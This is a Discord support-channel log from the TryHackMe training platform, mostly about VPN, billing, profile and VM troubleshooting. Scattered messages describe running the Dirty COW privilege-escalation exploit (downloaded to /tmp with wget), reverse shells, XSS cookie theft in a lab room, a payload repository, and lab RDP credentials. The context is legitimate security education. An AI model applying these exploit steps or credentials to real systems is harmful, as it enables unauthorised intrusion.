this fixed my problem https://github.com/tryhackme/openvpn-troubleshooting
#site-support
1 messages · Page 255 of 1
basically run this commands
cd ~/downloads
git clone https://github.com/tryhackme/openvpn-troubleshooting
cd "cloned folder"
sudo ./"toolname"
Gave +1 Rep to @restive berry
I’ll give it a go, thank you!
why did my streak go to zero? i haven't missed a day?
hello
how to work in web site on VM (demo.uploadvulns.thm)
not/Upload Vulnerabilities
Tutorial room exploring some basic file-upload vulnerabilities in websites
38%
You have to join the wreath room first
I joined and still the same thing
You joined right now? Try to hard refresh the access page then with ctrl + f5
not right now
but i will try a hard refresh
Well the join room button would be up there
it's not
not my first lab
Ye, just making sure as you sent an image that wouldn't show if you still in the room or not, as you get kicked out of it after 7 days.
oh
let me clear my cache and try again
Also i use adblockers, could that also be?
Not sure, but trying to turn them off might be worth a try
Was just trying to join wreath and then check the access page if it's working for me. It was, so just to let you know that this seems to be not an issue on THM`s side.
Sighs...it's still not working for me
I am frustrated
Trying a different browser maybe? And then double check with it if you have the join button and if the network is in the access page.
ok
Same thing on chrome
Mh, if there is no button to join the wreath room with chrome either, then I don't know what else to do the to either wait for tomorrow to see if it's working then, or to send an email to the support.
Last thing that might come to my mind is trying to log out of your account and back in
On chrome, I did that
Still chrome
Well, then I have no idea why it's not working unfortunately. So like I said, wait for tomorrow to see if it's working then as it might some coincidence with the 7 day kick timer, or write the support a message. Does the answer buttons say something like "You have to join the room first" or just the green "Submit" buttons?
I will send a mail. Thanks for the help
how to work in web site on VM (demo.uploadvulns.thm) (edited)
[10:44 AM]
not/Upload Vulnerabilities
Tutorial room exploring some basic file-upload vulnerabilities in websites
38%?????????
Why don't you answer to my question in #room-help rather then re-posting it here?
hello im having issues using ssh to connect to a deployed machine in my terminal. I have done all the necessary check to varify that openvpn is connected and working. But when i try to ssh into the machine, i am prompted to input a password but the room does not give any password for me to input for connecting. Am i missing something? I tried for example, sudo ssh tryhackme@10.10.217.211, and that didnt work. Then i tried the machines name. sudo ssh polosmb3@10.10.217.211 and that didnt work either. Please help if you can.
Hi, after 7 days strike it said I get a badge (got it) then Access Network ... I see nothing about that
Hi
How can i use tryhackme lab machine on my linux ?
I connected it with open vpn and the server is connected
The machine has also started but what am i supposed to do?
Well it depends on what room are you in, but just follow along the task as you would be on the attackbox.
I have the machine ip and it is saying access it using open vpn or attackbox
You have to join the networks room first in order to be able to download that networks vpn config file.
I want to use openvpn
Okay, ye then access that IP by whatever method it says in the task? What room are you doing btw?
Linux fundamentals
The attack box is only 1hr so i formed my own kali virtual machine
Installed openvpn and linked it to the tryhackme server
I have the machine ip and want to use it in kali on vm
Share the room link pls, as in linux fundamentals 1 I can't see where it says access it using openvpn.
I am in linux fundamentals part 2
:)
Okay, please be specific about the rooms when asked, that saves time search in the wrong room 😄
Ya sry :')
Okay, the room is telling you to use ssh to connect to the machine.
Then go ahead and do that, it's telling you the syntax you have to use and the password
so when i start my kali machine in virtualbox i get this
Failed to open a session for the virtual machine kali.
Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED).
Result Code: E_FAIL (0x80004005)
Component: ConsoleWrap
Interface: IConsole {872da645-4a9b-1727-bee2-5585105b9eed}
cant find anything helpful in the forums
@naive dust This channel is for directly THM related tech support like site or VPN issues.
bcdedit /set hypervisorlaunchtype off
Type this in command prompt and restart
wait really?
Yes. Really.
oh
Is there a way to put full name on certificates and badges?
Hello my machine wont stop and its down so idk what to do
You mean you can't start a new target machine or attackbox?
i cant end it to restart it
and when i ping it
or run any scripts
against it
its down
You can try this, but note that this will also shut down the attackbox #site-support message
Ctrl + F5?
how to rest mymachin not good working
I registered via my student mail to get the student's discount but my email wasn't recognized, so I contacted the support team via mail but I've not heard from them for more than 10 days now.
Any ideas ?
My streak days when to zero. Missed one day but had a one day streak and a seven day streak ticket redimmed.
Hey I have billing issue with my subscription. Kindly help me to whom I should get in touch with?
What else do I need to do for this badge?
I've tried using the customer support link and emailing support@hackme.com about this issue and have not gotten any feed back. I've hacked every day since Oct 20th and my hack streak says one. Does anyone know what I should try next?
Can someone help me understand what is considered a daily question on thm?
I am fairly new but I couldn't find the answer on the FAQ or the learning page.
I want to understand so I can start building a streak but I feel like a bit of a dunce rn.
anyone know how to enable corner snaping in ubuntu? like dragging an application to a corner and it takes up 0.25 of the screen
All you can do is email them. As far as I know there's only 1 person who answers the emails (I could very well be wrong about that tho). Either way there are over 700,000 users on tryhackme and there 1 support team. They'll get to you. Just give em some time
If you press the submit button for a question and you get the correct answer popup it counts as a daily question. To build a steak you need to answer at least 1 question every 24 hours
Tyvm!
I hope I don't overburden them. BTW, I've been maintaining the streak, if you look at my public profile, you'll see I haven't missed a day since October 20th.
Yea. They'll get around to it. I'm gonna assume you lost your streak even tho you shouldn't have. Just keep your streak up until they get to it and they put you where you should be
@naive dustsounds like a heating problem.
I swore I saw a process called world of warcraft installer on my linux pc once
It was like sighting a ufo
hi , i cant seem to open vulnersity room website
Do i need to add it to etc/hosts ?
cannot openit using attackbox as well.
looks like the openvpn is down for THM
What's the full url you try to open?
just the website url
So what's the full url, please post it
i cant start openvpn, as the network unreachable
Have you completed the questions of task 2 already?
not yet. I just started it
I just completed the juice shop earlier in Pentest + room
and it worked just fine
Then you might want to do task 2 first, as with the url you are trying the website is not gonna open.
So, both website and gobuster cmd will work after i completed task 2?
If you are using the correct url after finishing task 2, yes.
@deep trellis can I talk with you?
May I ask what it’s about @limpid current ?
I may be able to assist:)
@bronze vale is it possible to ask to you about the strike aswell ? Or is it enough I already sent an email ?
If you have sent an email, I will respond in around ~10 hours when I’m back home:)
Ok thanks a lot :)
Gave +1 Rep to @bronze vale
Hi There I have signed up on the website, initially it was showing me prices i £ (in the UK), however since I filled in some more of the details the prices are in $. I looked at my account and beside my phone number the country Afghanistan is selected. I suspect this is having an affect on location settings related to my account. I have made many attempts to change it, but it always goes back to Afghanistan.
I had a question about how to change the billing address on my subscription. I was paying for premium for several months, then had to move due to work. My billing address was updated at my bank, so when THM tried to bill me they got an error because my billing address did not match what they had on file. I had to go in and manually pay for 3-4 times, before finally just canceling my subscription. I tried to go back in this morning and start my subscription again, but it just goes back to the saved payment methods, and will not allow me to enter an updated billing address. Please help 🙂
@cinder wraith can I ask how did you try changing the country?
@lament trout By clicking the little flag beside my phone number. I tried to upload a screenshot here, but cant seem to figure that out 
hmm, I don't know the solution. You gotta verify in order to send media to this server. Refer to this:
!docs verify
Can't verify
Hey! I was just wondering how the student discount works :)
I've signed up with a .ac.uk address, but the prices are still the same 👀
How does one change the country associated with their THM profile?
what issue are you facing?
Make sure your IP matches the country you are trying to associate your profile with and use that link: https://tryhackme.com/api/user/update-timezone Note that this will also affect your timezone, so make sure it's the one you are in.
Curious question, is there a reason there isn't a US-East-VIP VPN connection? I'm assuming being a subscriber I would have access to the VIP connections but the only one I see is west
Not a definitive answer, but my guess is that there isn't enough east coast traffic to merit a VPN there.
Hello there, how can i change the name on the learning path certificate of Jr. Penetration Tester?
hey, can someone help me, in my virtual machine i can't acess any website, it just keeps loading until it time's out
@Kloose#4436
- did you connect to the VPN?
- does 10.10.10.10 load?
My ssh command is not working in kali
It is just waiting and after some time it shows connection closed
It is showing closed by port 22
@brave zealot which room and task?
@naive dust the best solution would be to take a backup and redo the OS installation.
is there a way to regenerate a badge image?
do you mean room badges?
yeah
i was wondering because the badge image didn't update my rank
Linux fundamentals part 3
I am using a virtual machine with kali installed
SSH was working fine yesterday but now it is just waiting getting timed out again again
I deleted the whole machine and formed a new one but the problem continues
Are you on your VM right now and and having the target machine started?
Yes
Should I try if I can ssh into your target machine in order to check if the issue is on your side or the machines side?
Right
Ok, works just fine. Is openvpn running directly inside your VM or on your host machine?
In my vm
If you enter ifconfig do you only see a tun0 interface or any extra like tun1, tun2 etc?
Only tun0
Then try that setting sudo ifconfig tun0 mtu 1200 and connect again to the target machine, in case that doesn't help just put it back to 1500
Tysm
It worked
Can you explain me a little bit what happened? I was wondering for hours

I don't know what happened, maybe your internet connection is not the best, for example.
So can it happen again?
Sure, as soon as you restart your machine the mtu setting will be on default again.
hey
my country is INDIA but why does it automatically got changed to afghanistan
??
i just gave my correct phone number
@dire otter did you click on that promt on the site that asked for your phone number?
ye i entered the phone no.
even I clicked on that and it changed to Afghanistan for me, just change it back.
Thank you @lament trout
Gave +1 Rep to @lament trout
Hey
Got a question for anybody who knows. What specification do I need to look at to see if a transmitter can send over photos and or videos. Example in my case I'm trying to figure out if a BMD-340 Stand-alone Bluetooth module can send over video and or photos. Thanks!
These are the features of the chip
Based on the Nordic Semiconductor nRF52840 SoC
• Bluetooth 5 PHYs: LE 1M, LE 2M, and LE Coded (long range)
• Bluetooth 5 features: Advertising Extensions, Channel Selection Algorithm #2
• Bluetooth mesh
• IEEE 802.15.4 with Thread and Zigbee support
• Complete RF solution with an integrated PCB antenna
• Integrated DC-DC converter
• No external components required
• Arm® Cortex®-M4 with FPU 32-bit processor
• Arm® TrustZone® Cryptocell 310 security
• True random number generator
• Serial Wire Debug (SWD)
• Nordic Semiconductor SoftDevice ready
• 1 MB embedded flash memory
• 256 KB RAM
• 48 General Purpose I/O Pins
• 12-bit/200 KSPS ADC
• One Full-Speed USB (12 Mbps)
• Four SPI Master/Slave (8 Mbps)
• Quad SPI with Execute in Place (XIP)
• PWM 4 blocks x 4-channels each
• General Purpose and Low power comparators
• Temperature sensor
• Two 2-wire Master/Slave (I2C compatible)
• I2S audio interface
• Two UARTs (w/ CTS/RTS and DMA)
• 20-channel CPU independent Programmable Peripheral Interconnect (PPI)
• Quadrature Demodulator (QDEC)
• 5 x 32 bit timer/counters
• 3 x 24 bit Real Timer Counters (RTC)
• NFC-A tag interface for OOB pairing
• Dimensions: 15.0 x 10.2 x 1.9 mm
Anyone please tell me how to connect external wireless adapter to kali in virtual box because when I am connect and run kali it crash my main machine please help me
Hey there,
I'm currently enrolled in the Linux fundamentals pt. 3 and am having issues ssh'ing into the box. It says that the password is "tryhackme" but I keep getting denied.
Steps I've taken to make remediate:
- Double/Triple-checked to make sure the IP address and username was correct
2.Made sure to check the password was correct
3. Restarted machine
I was having the same issue yesterday
Glad to know it wasn't just me..
Were you able to get it up and running?
I haven't tried this morning yet
Any way to force reset a network? Was running fine for Holo Network this morning, then it shut off due to timeout. Restarted it and now I can't connect via VPN or attack box at all. Rather not wait 4 hours to put a reset request in if possible. Hoping letting it shut off again and then rebooting it will fix it.
Hi guys, I could use some help. I have Kali on Vmware and my network usually works but now it doesn't anymore even though I didn't change anything (knowingly). It happened to me before but I got it to work some how
This are my settings for Kali
and my vmware-netcfg
nvm it works again, do I have anything wrong with my settings tho?
If you have some virtual network adapters from other programs, sometimes VMware will try to automatically bridge to those instead of the interface that's actually connected to your network
If you create a vmnet, set it to bridged, then where it says Bridged to: Automatic, you can manually select the network interface you want to bridge to
Then just set your VM to use the vmnet you created
okay will remember that, thanks
Any THM staff to assist me? I have faced issues related to due payment
@naive dust
i emailed yesterday. Provided all the details in email. Can you please solve the issue? @bronze vale
OK I am back with the screen shot. This is where I try to change the country, but it keeps going back to Afghanistan (I am in UK). I think there is some sort of Locale problem, as since this has started, prices are in $ and not £.
What country is your public profil showing?
It is also showing Afganistan
Then I guess it's related to that. You can update your time zone, which will also update your country with that link, make sure your IP matches an IP from your country, so not using a VPN. https://tryhackme.com/api/user/update-timezone
Ahh great stuff, that appears to have worked. Im not sure how it managed to get onto Afghanistan in the first place, as I have not been using a VPN. Any how, this appears to be resolved, thanks for your help!
Gave +1 Rep to @crystal marlin
My Attackbox looks like a regular linux server and not the usual GUI..
I tried resetting many times with no luck. What can I try?
I'd believe that's the intended behaviour of that room
You should be able to just enter commands into it so you don't have to ssh
Seems odd, but i'll give a go. Thanks.
It is. I'm a knob. Thanks!
Gave +1 Rep to @white trail
hey guys, do anyone know if i can access a amazon s3 server withou the web interface?
Hey, I have the 7 day streak freeze tickets but I don't think it worked as I missed just 5 days and my streak is gone
hey
anybody can please help me in post exploitation basics room
I am in task 3
4.) Transfer the loot.zip folder to your Attacker Machine
it says this when I use scp
thats in my my VM
and in the attackbox it asks for the root password which I dont know https://ibb.co/27Hwj6t
If you check out https://tryhackme.com/my-machine - it shows you the root password that was assigned for your attackbox, if that's what you are looking for.
hello guys, so I reinstalled kali and I get this error when I am trying to run my vm
Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED).
Result Code:
E_FAIL (0x80004005)
Component:
ConsoleWrap
Interface:
IConsole {872da645-4a9b-1727-bee2-5585105b9eed}
try this
maybe this works
@mortal hinge
not trying to sound rude but i think it would be useful if you tried using google first bc it would help more in the long-term so you know how to research your future problems easier
I found a good tutorial it works now
Nice. In general, most error messages have been reported and solved already. Most of the time just copy pasting the error message into Google will give you a solution real fast
I can't do the task bcz of burp suite issues.
Show screenshot of full error.
Umm can i show u after few hrs coz i got off rn and i am going to schl :(
Sure, no worries. Post it in #infosec-general as this channel is for support related to vpn and site issues.
Thanks
Good morning, hope you all are well.
My profile changed my Country to Afganistan (should be South Africa), tried to change the number feild on my profile, but that didn't change anything. Is there anything that I can speak to, to change this?
@safe sorrel click on the flag next to your number and see if you can change the country.
Tried that, it says that it updated, though the change doesn't reflect on the profile
is there something going on with the servers in the rooms? They hang for a few minutes losing connection, and than they work for a few minutes
Thank's I'll give it a try
hi
trying this for the first time
I can't connect
I don't have any VPNs on, just the web based thing
Hi Team
I could not find Flags after clicking on the website link provided
Room : Walking An Application - Jr. Penetration Tester
Viewing the page source I could not find the answers to the questions
please help me on this
@night elk #room-hints
Thanks
can you help me too
only thing I could find online is some proxy issue causing it
but I don't have a proxy on
Hi... Thank you for keeping one of the greatest resources in the web running. I really enjoy using it and subscribed today for a full year.
When I look at my profile page, it says that I am being charged £90.00, though the payment was $90.00. I am located in Denmark and paid in dollars, so I assume that the text on the profile is taking the amount of the payment and then using a pound sign because I am located in Europe.
Verify with your bank statement and not the site please
I did and everything is fine. I simply mention it, in case other people freaks out over the difference in currencies later on 🙂
---hi, doing https://tryhackme.com/room/fileinc the webserver appears to not start (task 2) nmap confirms no hidden ports -sS -p0- restart no change. how to i report the issue? i have been doing other rooms today and connect via openvpn---
ignore this apparently my open vpn had failed silently and restarting it has fixed my issue
Hey guys, I was told to move my questions here. I am having issues exploiting the machine in task 5 of linprivesc. I have compiled c0w.c and have opened a server but when I try to download it in the ssh'd user i get permission denied.
Any thoughts?
do you have permissions for the directory you're trying to write to? try it with -O /tmp/c0w
In the wget command? i tried it and got a 405 method not allowed. I was able to copy it into /var/tmp though
in that second image, you've not provided the port in the wget command
also I wanted to ask, how can I get unverified on old account and verify there on this one?
ps: I do not have access to my old discord account
I have the file in there now, i've tried running it with ./c0w but that is denied. Any thoughts?
you will need to chmod it to make it exectuable
Ah gotcha, i used chmod 777 and its executing, however c0w is stuck at the nmap part, does it take a while?
Admin
i haven't done the room and i'm not familiar with the exploit, i just knew what the problem was with your wget and ./c0w commands.
If you're getting a 405 error then your file isn't even downloading
If it's a binary did you try running type against it?
I appreciate the help though
God, i used a different exploit and boom 3 days of work figured out
do I have to dm him, tag him or?
Ping a mod, not staff. Maybe Muiri.
okay
@barren birch I wanted to ask, how can I get unverified on old account (I do not have access to it) and verify there on this one?
Glad ya got it figured 🙂
Hi team, my account keeps showing the Afghanistan flag although I am in United States. Could anyone help me with this?
@civic wren click on the flag and select United States
Did not work
Hey, does it still show after going to https://tryhackme.com/api/user/update-timezone
That worked! Thank you!
Gave +1 Rep to @zealous yoke
Can I get help about Kali Linux install?
#infosec-general @naive dust
Thanks
Hi could someone help me with getting a subscription as a student?
You're accounts needs to have a .edu email attached to it and I believe the discount is applied automatically. If you it wasn't applied or you don't have a student email I believe you need to email support
ah, I understand. My mail address is in this format: [student number]@student.[college domain]
Using openvpn, I have full connectivity and an assigned IP but cannot ping any of the boxes I start. Why could this be?
I use arch btw 😏
Some boxes do work - the tutorial box spins up fine
Ugh. Now it works. lol
@deep trellis and @zealous yoke , Is there a problem with Task 8, Cross-Site Scripting room ? After decoding the cookie and the session . When submitting the decoded cookie . I get wrong answer
No, it is a network mapper 😄
- Do not try to do any such thing on a device other than you own
- You aren't supposed to tag a higher privilege user just to answer your minor question
Please refer to #room-bugs
then who should i tag ?
You don't need to tag anyone for a simple question
If you have a big problem, you may tag either a Discord staff or a THM staff member
See the member list in your Discord application to find out who is currently online to help you out.
0xdgod?
Usually community members will help you out once you post your question or doubt😄
ok thanks
Gave +1 Rep to @keen scroll
Please don’t ping the site team:)
You need to redeploy the room, you got the wrong cookie, try again
Hi There,
I have been doing the learning paths. In the Web Fundamentals Learning Path there is a room called LFI which is in a broken state.
Tried first for hours, then looked at write-ups.
It is not possible currently to break-out of the displayed error message: No such file /opt/web/<filename>
Cant break out of it with null-byte / adding commands ( this isn't even mentioned in the write-ups )
So I wanted to share this information ...
hey @graceful garden is it possible for me to somehow unverify my old discord account which i have no access to and verify this one?
Hi, i have a question i'm not sure i'm in the good text chat, but i can't change my flag on my public profile it's stuck in Afghanistan flag and when i change it it's not changing do you know why ?
ctrl +c in the terminal where openvpn is running
@crystal marlin thanks brother
Gave +1 Rep to @crystal marlin
Hi, I have a question I stuck on Authentication Bypass since I cannot access the signup page even after start the machine. What should I do? Thank you
I pinged you in another channel, but I guess you didn't saw it. Are you trying to access the page from your own machine or from the attackbox?
thanks you it's working now 😄
Gave +1 Rep to @crystal marlin
anyone else has the problem, when they terminate a machine and want to start another one that it says, machine already running? when i refresh it show the old machine again...
I can't seem to terminate a machine that is running already?
hello,what is the minimum age for signing up at tryhackme?
don't think there is ..
You can try to post that in your console to terminate all machines (including attackbox)
Ill try that next time.. thanks @crystal marlin
Gave +1 Rep to @crystal marlin
I want to subscribe to a premium account how can i get the student discount
Hey guys, is there a way to force the discord bot to refresh rank/subscription/lvl ?
Just send the verify command with your token to the bot again.
I tried but it said '
Your level is already up-to-date.'
is it not up-to-date?@shadow arch
Are you referring your rank to the dashboard? As the dashboard is not showing your current rank, it's showing your next rank.
Yeah I know, I'll answer a few questions and see if it updates it. Not a big deal anyway haha
Greetings #site-support - A quick question - I am receiving the following "Uh-oh! You can only deploy a maximum of 3 machines at a time." When I attempt to start a machine, would you mind in sharing the procedure for determining which machines are currently running? or how do I gain access to them?
It's just the machines from the rooms you previously were in. So either just go back to these rooms manually or use the code snippet to terminate all machines. #site-support message
thank you @crystal marlin [{"roomId":"linuxfundamentalspart1","expires":"2021-11-19T17:20:58.553Z"
Gave +1 Rep to @crystal marlin
Hi, I updated my Country and it always change for Afghanistan ...
I'm surprised and not surprised that that works
Hello! i have was intended to buy 1 month subscription but by mistake bought 15 months.... Could any one help me on how to get refund... $150 is a huge amount for me
I think you would have to reach out via email to the support for that.
Thank you. Sent email just now
Hey, on OWASP Top10 is a link on Task 10 to xss-payloads.com. This Site looks like down
Task20 sry
Not sure exactly which payloads are needed for that room, however in general, you can find most payloads in this github repo: https://github.com/swisskyrepo/PayloadsAllTheThings
Hi All I have been using the provided attack boxes in most of my rooms, I just recently setup my own Linux box. I have setup the openvpn and downloaded my .ovpn file. I have setup ssl with a self signed cert and I have also setup ftp. Using the attackbox I can reverse shell just fine. But when I try on my own linux box the reverse shell is not working. In addition to SSL what do I need to do to get the reverse shell working. Do I need to open a series of ports for SSL? I am assuming that the reverse shells , in most cases use SSL?
It’s interesting that several of the same people keep winning monthly vouchers. Also, no one under lvl 8 seem to win…
Hi. How do I use the code to subscribe? Also cannot find where to change my country in the profile
X2
How much time need to complete this room in minutes
what happens if the time exceeds?
Nothing. It is used to calculate resources needed for this room in my opinion
Hi does anybody know if the voucher purchase for a sub can take a discount code? Or do I just wait for my sub to expire and then choose VIP from profile and purchase it that way?
can we not change our about once updated??
Helllo
Mystick ctf room , it says the owner has made the room private
Am I not able to do that machine now?
Not unless its made public again.
hi guys. Anyone knows why if i connect through VPN (windows or kali on a VM, anyway) to a practical room, the webpages doesn't load on firefox, but it does if i connect through the Attack Box?? Is that an common problem? I would like to work with the practical rooms with my Kali...
hi guys
I am trying to connect to a windows machine through rdp
its giving me this
It says authentication failure check creds, last line from below
is your VPN working? (can you ping or run maybe an nmap scan against the machine?)
can you send what you're getting here on discord instead? dont think people would want to open a link.
You are accessing the attackbox in the split view in your browser, right?
If you are not a subscriber your attackbox has no internet connection.
I cant paste a a picture onto this group for some reason
!docs verify
Send a mail to support
I have a brand new beginner question that i hope someone could answer for me. I just signed up for the website (free user). Before starting doing anything on the website. Do i need to run a VPN or open the website in a VM first (pretty much running a VM in an VM)? I was about to start the tutorial and saw it mentioned opening the attackbox and wasn't sure if i need to run this website in my VM first or if it's fine on my host /personal computer
you can run the website on you personal computer
and use the attackbox which is basically a VM on your browser
Oh perfect! Thank you so much for the help!
Gave +1 Rep to @near rose
The Redline room VM is extremely slow. Doing some excercises takes 75% waiting time. Can you assign more resouces to these VMs or an option to download a VM to run it locally?
Can't be run locally as they cannot be downloaded. If you are running inside of a VM yourself, try restarting the instance, reconnecting your VPN, and logging out and logging in again.
@oak ice you can start with this.
OpenVPN https://tryhackme.com/room/openvpn
Welcome https://tryhackme.com/jr/welcome
Intro to Researching https://tryhackme.com/room/introtoresearch
The Hacker Methodology https://tryhackme.com/room/hackermethodology
Learn Linux https://tryhackme.com/module/linux-fundamentals
Crash Course Pentesting https://tryhackme.com/room/ccpentesting
Awesome thank you. I was looking at it originally and wasn't sure if i needed to download my own VPN first to use it
Gave +1 Rep to @lament trout
I'm reading the sec+ study guide put out by comp tia, am I having a stroke or does this just make not make sense?
@near rose which room?
so i got a message while doing sqli room and it said add an hour your machine is about to expire while i had an hour and fifty minutes then i got a message indicates that my machine expired ( i still have access to it ) and i can't run the other machine cause i have already one machine that i can't terminate what do i do
for this
solved
i get this error whenever i try to export (this is Advent of Cyber 2), also happens with burpsuite when i try to export on repeater
If i run burpsuite as root it's fine, but is there a way I can export without running as root
have an issue where none of the IP's I receive work even if I switch to ac complete different box
Not sure what you mean, please be a bit more detailed.
fixed
idk where else to put this but I literally can't move files to my Documents folder on kali from a file in a folder in documents without sudo
Well then you simply don't have permission to do that.
Maybe something there is owned by root.
Well maybe you are trying to export to a directory where you don't have write permission to.
In what directory are you trying to export that file to?
ok i worked it out
but gimmie a sec
i got another question
what does the second file owner thing mean
like how it says kali then it says root
I made a stupid mistake of making the dir with root
The first one is the owner and the second one is the group.
But you can simply change that with sudo chown kali:kali AoC2
Or as you are logged in as root you don't need to use sudo, either way should work.
crap I accidently changed every owner to kali from /
Ouch ^^
big ouch
wth do i do now
I should take snapshots
I'm an idiot
oh well
looks like I'm gonna have to reinstall kali
Well I don't even know if you can undo that, but maybe google "undo previous command linux", maybe there is something.
time to uninstall i messed up :(
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHH
I HATE THISADJDSA:LFfldsjkl;asdfj
ok I need to keep calm
nearly 1am
Yep. Thats an easy way to give yourself a headache
ok i finished reinstalling kali
oof
Post exploitation basics
i need verify my discord 3 week not verify why ?
why docs ?
follow this link in order to verify
what does it say?
hi i want verify my discord account
i did exact steps inside the like you send it here
and i send my code to the Bot account mentioned in the link above
it doesn't reply me yet what should i suppose to do? Any Help here Thanks in advance
hey @near rose I tried RDP using remmina just for you and it worked in single try.
username: Administrator
password: P@$$W0rd its a zero and not alphabet O
domain: CONTROLLER
I also tried ssh as mentioned in task 2, that works fine as well.
ssh Administrator@<IP>
If you have "allow direct messages from server members" turned off in your privacy settings then it won't work.
Not sure if that's the issue in your case.
don't think that setting affects bots, not sure.
It does
oh
It does indeed.
Hello can I get some admin support please regarding a payment issue ?
thanks I find out that the issue was actually from setting the color resolution
Gave +1 Rep to @lament trout
I needed to change the settings
wrong chat oops
Does anyone also have problems connecting to the Windows Privesc machine In Jr Pentester Path? For some reason the machine just want load. I have tried multiple restarts . I wish they would have provided RDP credentials.
C:\Users\Surface>nmap -p- 192.168.1.145
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-21 16:31 Hora estßndar romance
Nmap scan report for 192.168.1.145
Host is up (0.011s latency).
All 65535 scanned ports on 192.168.1.145 are in ignored states.
Not shown: 65535 closed tcp ports (reset)
MAC Address: 8E:A2:0E:33:08:13 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
How does my mobile phone connect to the internet if it does not have a single port open?
This channel is for THM related issues 🙂
k
Hello, there. I have an issue with https://tryhackme.com/room/xssgi.
Task 8: Practical Example (Blind XSS)
I think there is a bug.
The link that was provided on the task is HTTPS, however, the payload is HTTP, in Firefox 78.14 it's impossible to fetch HTTP URL from a webpage opened with HTTPS. The error is "Blocked loading mixed active content". I've tried different variations. I was able to open web site with HTTP, create an HTTP payload and I received my cookie. But I didn't receive a staff cookie. As well I tried HTTPS web and HTTPS payload. As well I received a request, but it was encrypted obviously and I received only my request (when I opened the page with payload). I haven't received any stuff cookie requests.
You have to wait until the automation that's behind will open the ticket as a staff member. If you wait 2 - 3 min and you receive nothing then try to restart the machine or/and doing it on the attackbox or request catcher.
Yep. I know it. And I waited for 10 minutes every time I tried.
And yes, I stopped machine and start it again and it didn’t work.
On my public profile it always says that I'm from Afghanistan because is the first option in the settings. But i cannot change it....
Any idea?
There should be a "reset-timezone" link in the pinned messages, that seems to work
i have a problem with my discord account, i verified it with my personal account but i needed a new account for my study. Now my discord account is linked to an old account that is not being used instead of my school account on THM which i am using a lot.
Does anyone now how to change the linked account? using !verify with the new token doesnt work
@crystal marlin I've just tested it again and it works only on AttackBox.
Thanks a lot
Gave +1 Rep to @stray cove
Ok, ye that's why I suggested using the attackbox or the request catcher, although it was working for me on my local machine when I did that room. 🙂
Thanks!
Gave +1 Rep to @crystal marlin
My subscription ended on 21/11, and I have no enough funds for it to be renewed. What should I do if I want to cancel the subscription?
Why am I still have subscriber status?
Have you cancelled it on your THM profile page ?
Yes, but after the charging which failed
Then you probably best with sending an email to the support explaining your issue.
Thanks
!vpn
!tool
Any reason why I lost my 26 day streak randomly? Easily within the 24 hour mark as I worked last night this morning and tonight. It registered as my 26th day then reset 30 minutes later. I know it’s just a streak but it was a personal goal to get 30 days in a row. You can see on my profile activity how often I’m on as well.
You can send an email, ask nicely to recover your lost streak, as for randomly lost streak i have no clue. Worth mentioning it on the email
is there a problem in IN SERVER i m not able to connect
sorry 1 quest.
what if i cancel my subscription?
it expire at the renew date or immediately
tnks and sorry for dumb quest
Iirc you still subs until your subscription ends
tnks
Good Morning, i try Room "wordpresscve202129447" but iam stuck at the connect to the DB. i dont know what can i do to fix it, google results cant help me 😦
which vpn r u using
openvpn
Are you sure you fully connected with thm vpn?
Haven't completed the room, but might worth to check writeup
i checked, i have successfully read /var/www/html/wp-config.php, so i got the DB Name, User and PW. Next Step is to connect with MySQL DB
Can you try to use mysql from attackbox?
yes of course, i think its a local probelm but idk how to fix it :(, i try now vm from THM and write Feedback
Update your vm maybe
Command 'mysql' not found, but can be installed with:
apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1
On THM VM but i install packages
root@ip-10-10-60-184:~# mysql -u 10.10.117.230 -u thedarktangent -p
Enter password:
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2 "No such file or directory")
idk...
omg fail layer 8 😄
mysql -h http://10.10.117.230 -u thedarktangent -p.... without http it works 😄
works -> mysql -h 10.10.117.230 -u thedarktangent -p
Glhf
#site-support in room Redline -> task 5 IOC Search Collector, images are not visible
Try refresh the page
It shows on mine
strange
below steps
after
IOC Search Collector will ignore the data that doesn't match an IOC you have gathered. Although, you can always choose to collect additional data. As the Redline User Guide states, the quality of the IOC analysis will depend on the data you have available in the analysis session.
i'm not able to paste screenshot here
or upload image
!docs verify
You can, but you have to verified first
Is there any plugins on your browser
brave one is uploading
a
i had paused ghostery
but should have worked on other
i'm accessing from Dubai, any issue from here
What happened if you try open it from your phone
No clue
Try thid
it doesn't load in phone also
Strange
if chrome was the issue, it should have loaded in other browser
looks like ISP blocked some content here
i changed to US full tunnel vpn and it works
these urls are blocked in uae
"i.ibb.co" domain
@hollow otter thanks 🙂
Gave +1 Rep to @hollow otter
I'd like to subscribe to THM. I am a student, but registered with my private mail. I've changed the mail to my university mail and verified it. But it doesn't show the discount. Do I have to create a new account with my student mail as it needs to be the mail I registered with? Or should I directly write a mail to support and tell them that my university address seems not to be recognised (it does not end with .edu or .ac.uk)
I would reach out to the support explaining that to them. Especially because if your email didn't get recognised regarding that pinned message: #site-support message
I work from 7pm-10pm GMT
hey guys, I'm having a problem connecting the nmap Walkthroughs (same problem as free guest and vip) Problem is i cant reach the machine with ping or nmap. I tried with openvpn, web based kali and attackbox. Same result. Im connected, I renewed the opvn configuration file, restarted machine, killed opvn instances, terminate and start machine again... but no result. But i can paste the machine ip in browser and i get the ISS home page... any advice?
I've checked and i have the tun0 interface and opvn runs fine (Initialization Sequence Completed)
That's the page youre supposed to get?
you mean about the ISS page? I have to do some nmap exercises but as nmap and ping doesnt work i tried pasting the ip on a browser and voila IIS shows so i guess there's connection between me and the machinne
Can you send the link to the room?
What task are you up to?
The machine isn't supposed to respond to pings
You should have learned a way to get around that in a previous tadk
Task
Nmap by default does a ping scan to determine if the host is Up. Theres a specific flag you need to use to skip the ping scan
i tried the xmas scan too
you mean -Pn switch?
Well that does do what you need it to dosent it?
according what i read on task 13 i used nmap -sX -p1-999 10.10.149.220 -Pn -vv
sX for xmas nmap, -p to ports from 1 to 999 and -Pn to not do pings... -vv for verbose
Well, an Xmas scan will show lots and lots of open or filtered ports
You'll need to use something you learned in an earlier task
then i guess everything is working fine and its my mistake
so i need to re read previous tasks
Yep
Hello, am I able to change my username on THM ?
done, thanks ❤️
